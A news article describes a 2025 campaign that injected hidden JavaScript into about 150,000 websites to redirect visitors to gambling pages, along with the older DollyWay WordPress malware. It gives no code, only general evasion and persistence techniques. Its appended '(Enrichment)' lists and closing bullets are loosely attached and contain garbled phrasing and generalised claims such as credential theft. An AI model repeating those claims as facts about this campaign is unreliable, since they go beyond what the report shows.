Redirecting You to Unwanted Gambling Sites: A Hacker's Goldmine
Cyber Attackers' Stealthy Techniques to Make Bank
Website intrusions impact nearly 150,000 domains - Diversion to gambling platforms ensues
By Yannick Schroth, Edited by Angela Burke, Published on: 28.03.2025, Updated on: 24.04.2025
- Massive Redirection: 150K Legit Websites Hit by Chinese Gambling Scams
- Crafty Hackers Disguise Attacks with Fake Branding and Code
- Older Hacker Operations Also Use Manipulated WordPress Sites for Fraud Links
Cyber attackers have struck again, this time infecting approximately 150,000 legitimate websites with sneaky JavaScript code - leading users down a rabbit hole to Chinese gambling platforms. © Pixabay/Pixabay
Widespread Malware Advance Leads to Gambling Platform Promotion
Based on findings from GBHackers, a concerning cyber campaign has infected around 150,000 legitimate websites with malicious JavaScript code, with the intent to advertise Chinese-language gambling platforms. This attack stealthily uses so-called iframe injections to create full-screen overlay pages that mimic well-known providers like Bet365.
How Hackers Make a Quick Buck off Such Attacks
The objective of such attacks is straightforward: Financial gain through redirection. Hackers inject code onto foreign websites, automatically sending users - often unnoticing - to illegal gambling offers or fake shops. The perpetrators to reap rewards similar to legal affiliate marketing, earning a commission for each visitor who lands on such a site and potentially spends money.
Additionally, many malicious hackers use traffic broker networks. These platforms bundle web traffic, selling it to the highest bidder, even if it derives from fraudulent sources. The buyers then receive visitors delivered from these types of cyberattacks.
In short, the more people are misled and enticed into visiting manipulated websites, the more money the attackers stand to make, usually at users' expense.
According to a security analyst, the campaign was first detected in February 2025 with around 35,000 infected sites but has since significantly grown. Statistically, over 135,800 compromised domains are currently detectable.
Ways Attackers Employ Stealthy Redirection Techniques
The attackers camouflage their malware with HTML entities and hexadecimal coding, hiding it on specific domains. This means the malware initially appears harmless to human eyes but remains executable by the browser.
This attack demonstrates how cunning cybercriminals adapt, expand their reach, and employ new concealment methods. Sidewalk attacks like these are on the rise, and numerous examples are continuously uncovered.
The Goal is to Sneakily Redirect Users, Especially to China, Hong Kong, and the USA
The JavaScript payload detects mobile browsers and adapts the display and redirection dynamically, even through keyword recognition. Additionally, some variants of the campaign employ fake brand appearances of well-known providers, like Bet365, to feign authenticity.
A Parallel Attack, DollyWay Active for Years
In sync with the current campaign, a second attack wave called DollyWay World Domination has been operational since 2016 and has infected over 20,000 websites, as reported by GoDaddy. The primary focus is WordPress sites, where attackers inject manipulated PHP plugins.
The malware aims especially at security features, deletes admin accounts, and pilfers genuine credentials. Visitors to affected sites are then channelled through a network of compromised websites - known as Traffic Direction Systems (TDS) - to fraudulent pages belonging to the criminal network VexTrio. In some cases, the perpetrators profit from ad networks like PropellerAds.
VexTrio is infamous for distributing casino content, malware, and fraudulent offers. Webmasters are advised to regularly check their sites, remove suspicious redirects, and implement security measures like Content Security Policies - as hacking incidents are prevalent in the iGaming sector, for instance, at stake.com or Evolution.
(Enrichment) Potential Revenue Streams:
- Affiliate Programs: Hackers make money by redirecting users to these gambling platforms and earning commissions for each user who signs up or makes a deposit through their redirected link.
- Malicious Advertising: Users on redirected sites are bombarded with ads, some potentially harmful. Each click or interaction with these ads can generate revenue for the hacker.
- Data Theft and Sale: The injected JavaScript gathers sensitive user information, such as login credentials, financial data, or other personal details, which is then peddled on the dark web.
- Phishing and Scams: Redirected sites might lead to phishing traps designed to trick users into providing sensitive information or downloading malware, further increasing potential revenues through fraudulent means.
(Enrichment) Common Attack Methods:
- Exploiting Vulnerabilities: Hackers capitalize on plugin, theme, or server configuration vulnerabilities to inject malware onto legitimate sites.
- Evasion Techniques: Malware uses evasion methods like hiding plugin presence from admin panels, server-side PHP redirects, and implement cookie-based backdoors to maintain persistence.
- Persistent Attacks: Malware can reactivate by automated bot networks even after removal attempts, ensuring ongoing redirections and sustaining profits for the hackers.
Sources:[1]: Hidden JavaScript Files Exploit WordPress Vulnerability[2]: Understanding mu-plugins: What They Are and Why You Should Care[3]: WordPress Malware Stats for 2023 and How to Secure Your WP Sites
- What about these breached sites' owners, will they suffer financial losses due to the malicious redirects?
- The cyber attackers' malicious JavaScript code, disguised as legitimate content on 150,000 websites, aims to redirect users to Chinese-language gambling platforms, showcasing the sinister side of technology in the realm of cybersecurity.
- These crafty attacks not only allow hackers to earn through affiliate marketing-like commissions but also through malicious advertising and data theft.
- By employing evasion techniques and persistent attacks, the hackers ensure ongoing redirections and sustain profits, making cybersecurity against such threats a general-news topic of concern.
- Concerning cyberattacks like these, it is crucial for website owners to regularly check their sites, remove suspicious redirects, and implement security measures such as Content Security Policies to thwart malicious activities and maintain the integrity of their technology.
